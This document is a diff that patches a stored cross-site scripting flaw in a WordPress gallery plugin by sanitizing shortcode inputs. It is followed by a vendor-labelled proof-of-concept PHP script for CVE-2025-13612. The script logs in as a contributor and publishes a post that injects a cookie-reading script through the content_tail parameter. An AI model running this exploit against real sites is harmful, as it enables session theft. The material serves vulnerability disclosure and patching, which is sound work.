-	$album_ses			= ! empty( $_GET['album_ses'] ) ? $_GET['album_ses'] : '';
+	$album_ses			= ! empty( $_GET['album_ses'] ) ? sanitize_text_field( $_GET['album_ses'] ) : '';

 	// If album id passed and album_ses match to passed number
 	$aigpl_album_id 	= ! empty( $_GET['album'] )	? aigpl_clean_number( $_GET['album'], '', 'number' )	: '';
@@ -137,7 +137,7 @@
 	$slider_conf = compact( 'slidestoshow', 'slidestoscroll', 'dots', 'arrows', 'autoplay', 'autoplay_interval', 'speed', 'loop', 'lazyload' );

 	// If album id is not passed then take all albums else album images
-	if( $album_ses != $unique_album_no ) {
+	if ( $album_ses != $unique_album_no ) {

 		// WP Query Parameters
 		$args = array (
@@ -153,13 +153,13 @@
 		// Meta Query
 		$args['meta_query'] = array(
 								array(
-									'key'		=> $prefix.'gallery_imgs',
+									'key'		=> $prefix . 'gallery_imgs',
 									'value'		=> '',
 									'compare'	=> '!=',
 								));

 		// Category Parameter
-		if( ! empty( $category )) {
+		if ( ! empty( $category )) {

 			$args['tax_query'] = array(
 									array(
@@ -176,20 +176,20 @@
 	ob_start();

 	// If post is there
-	if( ( $album_ses != $unique_album_no ) && $aigpl_query->have_posts() ) { ?>
+	if ( ( $album_ses != $unique_album_no ) && $aigpl_query->have_posts() ) { ?>

 	<div class="aigpl-gallery-slider-wrp <?php echo esc_attr( $extra_class ); ?>">
 		<div class="aigpl-gallery-album-wrp aigpl-gallery-slider aigpl-gallery-album-slider aigpl-clearfix aigpl-album-<?php echo esc_attr( $album_design ); ?>" id="aigpl-gallery-<?php echo esc_attr( $unique ); ?>">
 			<?php while ( $aigpl_query->have_posts() ) : $aigpl_query->the_post();

-					$album_image		= add_query_arg( array( 'album' => $post->ID, 'album_ses' => $unique_album_no), $album_page )."#aigpl-album-gallery-".$unique_album_no;
+					$album_image		= add_query_arg( array( 'album' => $post->ID, 'album_ses' => $unique_album_no), $album_page ) . "#aigpl-album-gallery-" . $unique_album_no;
 					$image_link			= aigpl_get_image_src( get_post_thumbnail_id( $post->ID ), $image_size, true );
-					$total_photo_no		= get_post_meta( $post->ID, $prefix.'gallery_imgs', true );
+					$total_photo_no		= get_post_meta( $post->ID, $prefix .'gallery_imgs', true );
 					$total_photo_no		= ! empty( $total_photo_no ) ? count( $total_photo_no ) : '';
 					$total_photo_lbl	= str_replace('{total}', $total_photo_no, $total_photo);

 					// Include shortcode html file
-					if( $design_file ) {
+					if ( $design_file ) {
 						include( $design_file );
 					}

@@ -202,11 +202,11 @@
 	<?php
 		wp_reset_postdata(); // Reset WP Query

-	} elseif( ! empty( $aigpl_album_id ) && ( $album_ses == $unique_album_no ) ) { // If album id is passed
+	} elseif ( ! empty( $aigpl_album_id ) && ( $album_ses == $unique_album_no ) ) { // If album id is passed

-			echo "<div class='aigpl-breadcrumb-wrp' id='aigpl-album-gallery-{$unique_album_no}'><a class='aigpl-breadcrumb' href='{$album_page}'>".esc_html__('Main Album', 'album-and-image-gallery-plus-lightbox')."</a> » ".get_the_title($post_ids)."</div>";
+		echo "<div class='aigpl-breadcrumb-wrp' id='aigpl-album-gallery-{$unique_album_no}'><a class='aigpl-breadcrumb' href='{$album_page}'>" . esc_html__('Main Album', 'album-and-image-gallery-plus-lightbox') . "</a> » " . get_the_title($post_ids) . "</div>";

-			echo do_shortcode( '[aigpl-gallery id="'.$post_ids.'" grid="'.$grid.'" show_caption="'.$show_caption.'" gallery_height="'.$gallery_height.'" show_title="'.$show_title.'" show_description="'.$show_description.'" popup="'.$popup.'" link_target="'.$link_target.'" design="'.$design.'" image_size="'.$image_size.'"]' );
+		echo do_shortcode( '[aigpl-gallery id="' . $post_ids . '" grid="' . $grid . '" show_caption="' . $show_caption . '" gallery_height="' . $gallery_height . '" show_title="' . $show_title . '" show_description="' . $show_description . '" popup="' . $popup . '" link_target="' . $link_target . '" design="' . $design . '" image_size="' . $image_size . '"]' );

 	} // end else

--- a/album-and-image-gallery-plus-lightbox/includes/shortcode/aigpl-gallery-album.php
+++ b/album-and-image-gallery-plus-lightbox/includes/shortcode/aigpl-gallery-album.php
@@ -21,22 +21,22 @@
 	global $post;

 	// SiteOrigin Page Builder Gutenberg Block Tweak - Do not Display Preview
-	if( isset( $_POST['action'] ) && ($_POST['action'] == 'so_panels_layout_block_preview' || $_POST['action'] == 'so_panels_builder_content_json') ) {
+	if ( isset( $_POST['action'] ) && ($_POST['action'] == 'so_panels_layout_block_preview' || $_POST['action'] == 'so_panels_builder_content_json') ) {
 		return "[aigpl-gallery-album]";
 	}

 	// Divi Frontend Builder - Do not Display Preview
-	if( function_exists( 'et_core_is_fb_enabled' ) && isset( $_POST['is_fb_preview'] ) && isset( $_POST['shortcode'] ) ) {
+	if ( function_exists( 'et_core_is_fb_enabled' ) && isset( $_POST['is_fb_preview'] ) && isset( $_POST['shortcode'] ) ) {
 		return '<div class="aigpl-builder-shrt-prev">
-					<div class="aigpl-builder-shrt-title"><span>'.esc_html__('Album Grid View', 'album-and-image-gallery-plus-lightbox').'</span></div>
+					<div class="aigpl-builder-shrt-title"><span>' . esc_html__('Album Grid View', 'album-and-image-gallery-plus-lightbox') . '</span></div>
 					aigpl-gallery-album
 				</div>';
 	}

 	// Fusion Builder Live Editor - Do not Display Preview
-	if( class_exists( 'FusionBuilder' ) && (( isset( $_GET['builder'] ) && $_GET['builder'] == 'true' ) || ( isset( $_POST['action'] ) && $_POST['action'] == 'get_shortcode_render' )) ) {
+	if ( class_exists( 'FusionBuilder' ) && (( isset( $_GET['builder'] ) && $_GET['builder'] == 'true' ) || ( isset( $_POST['action'] ) && $_POST['action'] == 'get_shortcode_render' )) ) {
 		return '<div class="aigpl-builder-shrt-prev">
-					<div class="aigpl-builder-shrt-title"><span>'.esc_html__('Gallery Grid View', 'album-and-image-gallery-plus-lightbox').'</span></div>
+					<div class="aigpl-builder-shrt-title"><span>' . esc_html__('Gallery Grid View', 'album-and-image-gallery-plus-lightbox') . '</span></div>
 					aigpl-gallery-album
 				</div>';
 	}
@@ -72,10 +72,10 @@

 	$album_designs		= aigpl_album_designs();
 	$unique_album_no	= aigpl_unique_num();
-	$content_tail		= html_entity_decode( $content_tail );
-	$limit				= ! empty( $limit )						? $limit							: 15;
-	$post_ids			= ! empty( $id )						? explode( ',', $id )				: array();
-	$album_grid			= ( ! empty( $album_grid ) && $album_grid <= 12 )	? $album_grid			: 3;
+	$content_tail		= sanitize_text_field( $content_tail );
+	$limit				= ! empty( $limit )						? absint($limit)							: 15;
+	$post_ids			= ! empty( $id )						? array_map( 'absint', explode( ',', $id ) )	: array();
+	$album_grid			= ( ! empty( $album_grid ) && $album_grid <= 12 )	? absint($album_grid)			: 3;
 	$album_design		= ( $album_design && ( array_key_exists( trim( $album_design ), $album_designs ))) ? trim( $album_design ) : 'design-1';
 	$album_link_target	= ( $album_link_target == 'blank' )		? '_blank'							: '_self';
 	$album_title		= ( $album_title == 'true' )			? 1									: 0;
@@ -89,7 +89,7 @@
 	$extra_class		= $extra_class .' '. $align .' '. $className;
 	$extra_class		= aigpl_sanitize_html_classes( $extra_class );
 	$lazyload			= '';
-	$album_ses			= ! empty( $_GET['album_ses'] )	? $_GET['album_ses']	: '';
+	$album_ses			= ! empty( $_GET['album_ses'] )	? sanitize_text_field( $_GET['album_ses'] )	: '';

 	// If album id passed and album_ses match to passed number
 	$aigpl_album_id 	= ! empty( $_GET['album'] )	? aigpl_clean_number( $_GET['album'], '', 'number' )	: '';
@@ -110,7 +110,7 @@
 	$main_cls	= "aigpl-cnt-wrp aigpl-col-{$album_grid} aigpl-columns";

 	// If album id is not passed then take all albums else album images
-	if( $album_ses != $unique_album_no ) {
+	if ( $album_ses != $unique_album_no ) {

 		// WP Query Parameters
 		$args = array (
@@ -126,13 +126,13 @@
 		// Meta Query
 		$args['meta_query'] = array(
 								array(
-									'key'		=> $prefix.'gallery_imgs',
+									'key'		=> $prefix . 'gallery_imgs',
 									'value'		=> '',
 									'compare'	=> '!=',
 								));

 		// Category Parameter
-		if( ! empty( $category ) ) {
+		if ( ! empty( $category ) ) {
 			$args['tax_query'] = array(
 									array(
 										'taxonomy'	=> AIGPL_CAT,
@@ -155,22 +155,22 @@

 		<?php while ( $aigpl_query->have_posts() ) : $aigpl_query->the_post();

-				$wrpper_cls			= ( $loop_count == 1 ) ? $main_cls.' aigpl-first' : $main_cls;
-				$album_image		= add_query_arg( array( 'album' => $post->ID, 'album_ses' => $unique_album_no), $album_page )."#aigpl-album-gallery-".$unique_album_no;
+				$wrpper_cls			= ( $loop_count == 1 ) ? $main_cls . ' aigpl-first' : $main_cls;
+				$album_image		= add_query_arg( array( 'album' => $post->ID, 'album_ses' => $unique_album_no), $album_page ) . "#aigpl-album-gallery-" . $unique_album_no;
 				$image_link			= aigpl_get_image_src( get_post_thumbnail_id( $post->ID ), $image_size, true );
 				$total_photo_no		= get_post_meta( $post->ID, $prefix.'gallery_imgs', true );
 				$total_photo_no		= ! empty( $total_photo_no ) ? count( $total_photo_no ) : '';
 				$total_photo_lbl	= str_replace( '{total}', $total_photo_no, $total_photo );

 				// Include shortcode html file
-				if( $design_file ) {
+				if ( $design_file ) {
 					include( $design_file );
 				}

 				$loop_count++; // Increment loop count

 				// Reset loop count
-				if( $loop_count == $album_grid ) {
+				if ( $loop_count == $album_grid ) {
 					$loop_count = 0;
 				}
 		endwhile; ?>
@@ -180,11 +180,11 @@
 	<?php
 		wp_reset_postdata(); // Reset WP Query

-	} elseif( ! empty( $aigpl_album_id ) && ( $album_ses == $unique_album_no ) ) { // If album id is passed
+	} elseif ( ! empty( $aigpl_album_id ) && ( $album_ses == $unique_album_no ) ) { // If album id is passed

-			echo "<div class='aigpl-breadcrumb-wrp' id='aigpl-album-gallery-{$unique_album_no}'><a class='aigpl-breadcrumb' href='{$album_page}'>".esc_html__('Main Album', 'album-and-image-gallery-plus-lightbox')."</a> » ".get_the_title($post_ids)."</div>";
+			echo "<div class='aigpl-breadcrumb-wrp' id='aigpl-album-gallery-{$unique_album_no}'><a class='aigpl-breadcrumb' href='{$album_page}'>" . esc_html__('Main Album', 'album-and-image-gallery-plus-lightbox') . "</a> » " . get_the_title($post_ids) . "</div>";

-			echo do_shortcode( '[aigpl-gallery id="'.$post_ids.'" grid="'.$grid.'" gallery_height="'.$gallery_height.'" show_caption="'.$show_caption.'" show_title="'.$show_title.'" show_description="'.$show_description.'" popup="'.$popup.'" link_target="'.$link_target.'" design="'.$design.'" image_size="'.$image_size.'"]' );
+			echo do_shortcode( '[aigpl-gallery id="' . $post_ids . '" grid="' . $grid . '" gallery_height="' . $gallery_height . '" show_caption="' . $show_caption . '" show_title="' . $show_title . '" show_description="' . $show_description . '" popup="' . $popup . '" link_target="' . $link_target . '" design="' . $design . '" image_size="' . $image_size . '"]' );

 	} // end else

--- a/album-and-image-gallery-plus-lightbox/wpos-analytics/wpos-analytics.php
+++ b/album-and-image-gallery-plus-lightbox/wpos-analytics/wpos-analytics.php
@@ -57,7 +57,7 @@
 	 */
 	public function __clone() {
 		// Cloning instances of the class is forbidden.
-		_doing_it_wrong( __FUNCTION__, __( 'Cheatin’ huh?', 'pwpc' ), '1.0' );
+		_doing_it_wrong( __FUNCTION__, __( 'Cheatin’ huh?', 'album-and-image-gallery-plus-lightbox' ), '1.0' );
 	}

 	/**
--- a/album-and-image-gallery-plus-lightbox/wpos-plugins/includes/admin/class-espbw-admin.php
+++ b/album-and-image-gallery-plus-lightbox/wpos-plugins/includes/admin/class-espbw-admin.php
@@ -29,11 +29,11 @@
 		global $wpos_espbw_module;

 		// Loop of menu
-		if( ! empty( $wpos_espbw_module ) ) {
+		if ( ! empty( $wpos_espbw_module ) ) {
 			foreach ($wpos_espbw_module as $module_key => $module_val) {

 				// Dashboard Page
-				add_submenu_page( $module_val['menu'], __('Essential Plugins Bundle By WP OnlineSuport', 'espbw'), '<span style="color:#2ECC71;">'.__('Install Our Popular Plugins', 'espbw').'</span>', 'manage_options', "{$module_val['prefix']}-espbw-dashboard", array($this, 'espbw_dashboard_page'), $module_val['position'] );
+				add_submenu_page( $module_val['menu'], __('Essential Plugins Bundle By EssentialPlugin', 'album-and-image-gallery-plus-lightbox'), '<span style="color:#2ECC71;">' . __('Install Our Popular Plugins', 'album-and-image-gallery-plus-lightbox') . '</span>', 'manage_options', "{$module_val['prefix']}-espbw-dashboard", array($this, 'espbw_dashboard_page'), $module_val['position'] );
 			}
 		}
 	}
--- a/album-and-image-gallery-plus-lightbox/wpos-plugins/includes/admin/views/dashboard.php
+++ b/album-and-image-gallery-plus-lightbox/wpos-plugins/includes/admin/views/dashboard.php
@@ -39,10 +39,10 @@
 $plugins_filter = wpos_espbw_plugins_filter();

 // Check Plugin Install Permission
-if( ! current_user_can('install_plugins') ) {
+if ( ! current_user_can('install_plugins') ) {
 	echo '<div class="error">
-			<p>'. esc_html__( "Sorry, It looks like that you do not have permission to install the plugin.", "espbw") .'</p>
-			<p>'. esc_html__("You can take a look at our all plugins at", "espbw") .' <a href="https://profiles.wordpress.org/essentialplugin#content-plugins" target="_blank">'. esc_html__("here", "espbw") . '</a>.</p>
+			<p>' . esc_html__( "Sorry, It looks like that you do not have permission to install the plugin.", "album-and-image-gallery-plus-lightbox") . '</p>
+			<p>' . esc_html__("You can take a look at our all plugins at", "album-and-image-gallery-plus-lightbox") . ' <a href="https://profiles.wordpress.org/essentialplugin#content-plugins" target="_blank">' . esc_html__("here", "album-and-image-gallery-plus-lightbox") . '</a>.</p>
 		 </div>';
 	return;
 }
@@ -56,7 +56,7 @@
 		<div class="espbw-dashboard-title">
 			<div class="espbw-dashboard-title-inr">
 				<div class="espbw-dashboard-logo"><img src="<?php echo esc_url( WPOS_ESPBW_URL ); ?>assets/images/essentialplugin-logo.png" alt="essentialplugin" /></div>
-				<h3 style="text-align:center;"><?php esc_html_e( 'Essential Plugin', 'espbw' ); ?></h3>
+				<h3 style="text-align:center;"><?php esc_html_e( 'Essential Plugin', 'album-and-image-gallery-plus-lightbox' ); ?></h3>
 				<em class="wpos-em">Installs directly from <b>wordpress.org</b> repository</em> <br />
 			</div>
 		</div>
@@ -64,15 +64,15 @@

 		<div class="wp-filter espbw-filter">
 			<ul class="filter-links espbw-filter-links">
-				<li class="espbw-plugin-all"><a href="javascript:void(0);" class="espbw-filter-link current"><?php esc_html_e('All Essential Plugins', 'espbw'); ?></a></li>
-				<li class="espbw-plugin-recommended"><a href="javascript:void(0);" class="espbw-filter-link" data-filter="recommended"><?php esc_html_e('Utility Plugins', 'espbw'); ?></a></li>
-				<li class="espbw-plugin-sliders"><a href="javascript:void(0);" class="espbw-filter-link" data-filter="sliders"><?php esc_html_e('Sliders', 'espbw'); ?></a></li>
-				<li class="espbw-plugin-woo"><a href="javascript:void(0);" class="espbw-filter-link" data-filter="woocommerce"><?php esc_html_e('WooCommerce', 'espbw'); ?></a></li>
+				<li class="espbw-plugin-all"><a href="javascript:void(0);" class="espbw-filter-link current"><?php esc_html_e('All Essential Plugins', 'album-and-image-gallery-plus-lightbox'); ?></a></li>
+				<li class="espbw-plugin-recommended"><a href="javascript:void(0);" class="espbw-filter-link" data-filter="recommended"><?php esc_html_e('Utility Plugins', 'album-and-image-gallery-plus-lightbox'); ?></a></li>
+				<li class="espbw-plugin-sliders"><a href="javascript:void(0);" class="espbw-filter-link" data-filter="sliders"><?php esc_html_e('Sliders', 'album-and-image-gallery-plus-lightbox'); ?></a></li>
+				<li class="espbw-plugin-woo"><a href="javascript:void(0);" class="espbw-filter-link" data-filter="woocommerce"><?php esc_html_e('WooCommerce', 'album-and-image-gallery-plus-lightbox'); ?></a></li>
 			</ul>

 			<form class="search-form search-plugins" method="get">
 				<input type="hidden" name="page" value="espbw-dashboard" />
-				<input type="search" name="espbw_search" value="" class="wp-filter-search espbw-search-inp espbw-search-inp-js" placeholder="<?php echo esc_html_e('Search Plugins e.g popup', 'espbw'); ?>" />
+				<input type="search" name="espbw_search" value="" class="wp-filter-search espbw-search-inp espbw-search-inp-js" placeholder="<?php echo esc_html_e('Search Plugins e.g popup', 'album-and-image-gallery-plus-lightbox'); ?>" />
 			</form>
 		</div>

@@ -90,8 +90,8 @@
 						// Taking some data
 						$title					= wp_kses( $plugin_data['name'], $plugins_allowedtags );
 						$version				= wp_kses( $plugin_data['version'], $plugins_allowedtags );
-						$name					= strip_tags( $title . ' ' . $version );
-						$description			= strip_tags( $plugin_data['short_description'] );
+						$name					= wp_strip_all_tags( $title . ' ' . $version );
+						$description			= wp_strip_all_tags( $plugin_data['short_description'] );
 						$last_updated_timestamp = strtotime( $plugin_data['last_updated'] );
 						$author					= wp_kses( $plugin_data['author'], $plugins_allowedtags );
 						$author					= str_replace( "href=", 'target="_blank" href=', $author );
@@ -107,7 +107,7 @@
 						// Author String
 						if ( ! empty( $author ) ) {
 							/* translators: %s: Plugin author. */
-							$author = ' <cite>' . sprintf( __( 'By %s' ), $author ) . '</cite>';
+							$author = ' <cite>' . sprintf( __( 'By %s', 'album-and-image-gallery-plus-lightbox' ), $author ) . '</cite>';
 						}

 						// Plugin Icon
@@ -136,14 +136,14 @@
 												esc_attr( $plugin_data['slug'] ),
 												esc_url( $status['url'] ),
 												/* translators: %s: Plugin name and version. */
-												esc_attr( sprintf( __( 'Install %s now' ), $name ) ),
+												esc_attr( sprintf( __( 'Install %s now', 'album-and-image-gallery-plus-lightbox' ), $name ) ),
 												esc_attr( $name ),
-												__( 'Install Now' )
+												__( 'Install Now', 'album-and-image-gallery-plus-lightbox' )
 											);
 										} else {
 											$action_links[] = sprintf(
 												'<button type="button" class="button button-disabled" disabled="disabled">%s</button>',
-												_x( 'Cannot Install', 'plugin' )
+												_x( 'Cannot Install', 'plugin', 'album-and-image-gallery-plus-lightbox' )
 											);
 										}
 									}
@@ -158,14 +158,14 @@
 												esc_attr( $plugin_data['slug'] ),
 												esc_url( $status['url'] ),
 												/* translators: %s: Plugin name and version. */
-												esc_attr( sprintf( __( 'Update %s now' ), $name ) ),
+												esc_attr( sprintf( __( 'Update %s now', 'album-and-image-gallery-plus-lightbox' ), $name ) ),
 												esc_attr( $name ),
-												__( 'Update Now' )
+												__( 'Update Now', 'album-and-image-gallery-plus-lightbox' )
 											);
 										} else {
 											$action_links[] = sprintf(
 												'<button type="button" class="button button-disabled" disabled="disabled">%s</button>',
-												_x( 'Cannot Update', 'plugin' )
+												_x( 'Cannot Update', 'plugin', 'album-and-image-gallery-plus-lightbox' )
 											);
 										}
 									}
@@ -176,12 +176,12 @@
 									if ( is_plugin_active( $status['file'] ) ) {
 										$action_links[] = sprintf(
 											'<button type="button" class="button button-disabled" disabled="disabled">%s</button>',
-											_x( 'Active', 'plugin' )
+											_x( 'Active', 'plugin', 'album-and-image-gallery-plus-lightbox' )
 										);
 									} elseif ( current_user_can( 'activate_plugin', $status['file'] ) ) {
-										$button_text = __( 'Activate' );
+										$button_text = __( 'Activate', 'album-and-image-gallery-plus-lightbox' );
 										/* translators: %s: Plugin name. */
-										$button_label = _x( 'Activate %s', 'plugin' );
+										$button_label = _x( 'Activate %s', 'plugin', 'album-and-image-gallery-plus-lightbox' );
 										$activate_url = add_query_arg(
 											array(
 												'_wpnonce' => wp_create_nonce( 'activate-plugin_' . $status['file'] ),
@@ -192,9 +192,9 @@
 										);

 										if ( is_network_admin() ) {
-											$button_text = __( 'Network Activate' );
+											$button_text = __( 'Network Activate', 'album-and-image-gallery-plus-lightbox' );
 											/* translators: %s: Plugin name. */
-											$button_label = _x( 'Network Activate %s', 'plugin' );
+											$button_label = _x( 'Network Activate %s', 'plugin', 'album-and-image-gallery-plus-lightbox' );
 											$activate_url = add_query_arg( array( 'networkwide' => 1 ), $activate_url );
 										}

@@ -207,7 +207,7 @@
 									} else {
 										$action_links[] = sprintf(
 											'<button type="button" class="button button-disabled" disabled="disabled">%s</button>',
-											_x( 'Installed', 'plugin' )
+											_x( 'Installed', 'plugin', 'album-and-image-gallery-plus-lightbox' )
 										);
 									}
 									break;
@@ -218,9 +218,9 @@
 							'<a href="%s" class="thickbox open-plugin-details-modal" aria-label="%s" data-title="%s">%s</a>',
 							esc_url( $details_link ),
 							/* translators: %s: Plugin name and version. */
-							esc_attr( sprintf( __( 'More information about %s' ), $name ) ),
+							esc_attr( sprintf( __( 'More information about %s', 'album-and-image-gallery-plus-lightbox' ), $name ) ),
 							esc_attr( $name ),
-							__( 'More Details' )
+							__( 'More Details', 'album-and-image-gallery-plus-lightbox' )
 						);
 					?>

@@ -265,10 +265,10 @@
 								</div>

 								<div class="column-updated">
-									<strong><?php esc_html_e( 'Last Updated:' ); ?></strong>
+									<strong><?php esc_html_e( 'Last Updated:', 'album-and-image-gallery-plus-lightbox' ); ?></strong>
 									<?php
 										/* translators: %s: Human-readable time difference. */
-										printf( __( '%s ago' ), human_time_diff( $last_updated_timestamp ) );
+										printf( __( '%s ago', 'album-and-image-gallery-plus-lightbox' ), human_time_diff( $last_updated_timestamp ) );
 									?>
 								</div>

@@ -278,27 +278,27 @@
 										$active_installs_millions = floor( $plugin_data['active_installs'] / 1000000 );
 										$active_installs_text     = sprintf(
 											/* translators: %s: Number of millions. */
-											_nx( '%s+ Million', '%s+ Million', $active_installs_millions, 'Active plugin installations' ),
+											_nx( '%s+ Million', '%s+ Million', $active_installs_millions, 'Active plugin installations', 'album-and-image-gallery-plus-lightbox' ),
 											number_format_i18n( $active_installs_millions )
 										);
 									} elseif ( 0 == $plugin_data['active_installs'] ) {
-										$active_installs_text = _x( 'Less Than 10', 'Active plugin installations' );
+										$active_installs_text = _x( 'Less Than 10', 'Active plugin installations', 'album-and-image-gallery-plus-lightbox' );
 									} else {
 										$active_installs_text = number_format_i18n( $plugin_data['active_installs'] ) . '+';
 									}
 									/* translators: %s: Number of installations. */
-									printf( __( '%s Active Installations' ), $active_installs_text );
+									printf( __( '%s Active Installations', 'album-and-image-gallery-plus-lightbox' ), $active_installs_text );
 									?>
 								</div>

 								<div class="column-compatibility">
 									<?php
 									if ( ! $tested_wp ) {
-										echo '<span class="compatibility-untested">' . __( 'Untested with your version of WordPress' ) . '</span>';
+										echo '<span class="compatibility-untested">' . __( 'Untested with your version of WordPress', 'album-and-image-gallery-plus-lightbox' ) . '</span>';
 									} elseif ( ! $compatible_wp ) {
-										echo '<span class="compatibility-incompatible">' . __( '<strong>Incompatible</strong> with your version of WordPress' ) . '</span>';
+										echo '<span class="compatibility-incompatible">' . __( '<strong>Incompatible</strong> with your version of WordPress', 'album-and-image-gallery-plus-lightbox' ) . '</span>';
 									} else {
-										echo '<span class="compatibility-compatible">' . __( '<strong>Compatible</strong> with your version of WordPress' ) . '</span>';
+										echo '<span class="compatibility-compatible">' . __( '<strong>Compatible</strong> with your version of WordPress', 'album-and-image-gallery-plus-lightbox' ) . '</span>';
 									}
 									?>
 								</div>
@@ -309,14 +309,14 @@
 					<?php } ?>

 				</div>
-				<div class="espbw-hide espbw-search-no-result"><?php esc_html_e('Sorry, No result found. Please refine your search.', 'espbw'); ?></div>
+				<div class="espbw-hide espbw-search-no-result"><?php esc_html_e('Sorry, No result found. Please refine your search.', 'album-and-image-gallery-plus-lightbox'); ?></div>
 			</div><!-- end .espbw-plugin-list-wrap -->
 		</form>
 		<?php } else { ?>

 				<div class="espbw-no-result">
-					<p><?php esc_html_e('Sorry, Something happened wrong.', 'espbw'); ?></p>
-					<p><?php esc_html_e('You can take a look at our all plugins at', 'espbw'); ?> <a href="https://profiles.wordpress.org/essentialplugin#content-plugins" target="_blank"><?php esc_html_e('here', 'espbw'); ?></a>.</p>
+					<p><?php esc_html_e('Sorry, Something happened wrong.', 'album-and-image-gallery-plus-lightbox'); ?></p>
+					<p><?php esc_html_e('You can take a look at our all plugins at', 'album-and-image-gallery-plus-lightbox'); ?> <a href="https://profiles.wordpress.org/essentialplugin#content-plugins" target="_blank"><?php esc_html_e('here', 'album-and-image-gallery-plus-lightbox'); ?></a>.</p>
 				</div>

 			<?php }
--- a/album-and-image-gallery-plus-lightbox/wpos-plugins/includes/class-espbw-script.php
+++ b/album-and-image-gallery-plus-lightbox/wpos-plugins/includes/class-espbw-script.php
@@ -36,7 +36,7 @@
 		wp_register_script( 'espbw-admin-script', WPOS_ESPBW_URL.'assets/js/admin-script.js', array('jquery'), WPOS_ESPBW_VERSION, true );

 		// Olny for dashboard screen
-		if( strpos( $page, 'espbw-dashboard' ) !== false ) {
+		if ( strpos( $page, 'espbw-dashboard' ) !== false ) {

 			// enqueing admin css
 			wp_enqueue_style( 'espbw-admin-css' );
--- a/album-and-image-gallery-plus-lightbox/wpos-plugins/wpos-recommendation.php
+++ b/album-and-image-gallery-plus-lightbox/wpos-plugins/wpos-recommendation.php
@@ -57,7 +57,7 @@
 	 */
 	public function __clone() {
 		// Cloning instances of the class is forbidden.
-		_doing_it_wrong( __FUNCTION__, __( 'Cheatin’ huh?' ), '1.0' );
+		_doing_it_wrong( __FUNCTION__, __( 'Cheatin’ huh?', 'album-and-image-gallery-plus-lightbox' ), '1.0' );
 	}

 	/**
@@ -69,7 +69,7 @@
 	 */
 	public function __wakeup() {
 		// Unserializing instances of the class is forbidden.
-		_doing_it_wrong( __FUNCTION__, __( 'Cheatin’ huh?' ), '1.0' );
+		_doing_it_wrong( __FUNCTION__, __( 'Cheatin’ huh?', 'album-and-image-gallery-plus-lightbox' ), '1.0' );
 	}

 	/**

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-13612 - Album and Image Gallery Plus Lightbox <= 2.1.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via Plugin's Shortcode

<?php

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'contributor_user';
$password = 'contributor_password';

// Payload to inject via content_tail parameter
$xss_payload = '...<script>alert(document.cookie)</script>';

// Initialize cURL session
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Step 1: Login to WordPress
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
$response = curl_exec($ch);

// Step 2: Get nonce for creating new post
$new_post_url = $target_url . '/wp-admin/post-new.php';
curl_setopt($ch, CURLOPT_URL, $new_post_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Extract nonce from the page (simplified - in real scenario use DOM parsing)
preg_match('/"_wpnonce" value="([a-f0-9]+)"/', $response, $matches);
$nonce = isset($matches[1]) ? $matches[1] : '';

// Step 3: Create new post with malicious shortcode
$save_post_url = $target_url . '/wp-admin/post.php';
$post_data = array(
    'post_title' => 'Test Post with XSS',
    'content' => '[aigpl-gallery-album content_tail="' . $xss_payload . '"]',
    'post_type' => 'post',
    'post_status' => 'publish',
    '_wpnonce' => $nonce,
    '_wp_http_referer' => $new_post_url,
    'action' => 'editpost',
    'post_ID' => '',
    'originalaction' => 'editpost',
    'original_post_status' => 'auto-draft',
    'referredby' => '',
    'meta-box-order-nonce' => $nonce,
    'closedpostboxesnonce' => $nonce,
    'save' => 'Publish'
);

curl_setopt($ch, CURLOPT_URL, $save_post_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
$response = curl_exec($ch);

// Extract post ID from response
preg_match('/post=([0-9]+)&/', $response, $post_matches);
$post_id = isset($post_matches[1]) ? $post_matches[1] : '';

if ($post_id) {
    echo "Exploit successful! Post created with ID: " . $post_id . "n";
    echo "Visit: " . $target_url . "/?p=" . $post_id . " to trigger the XSSn";
} else {
    echo "Exploit failed. Check credentials and permissions.n";
}

curl_close($ch);

?>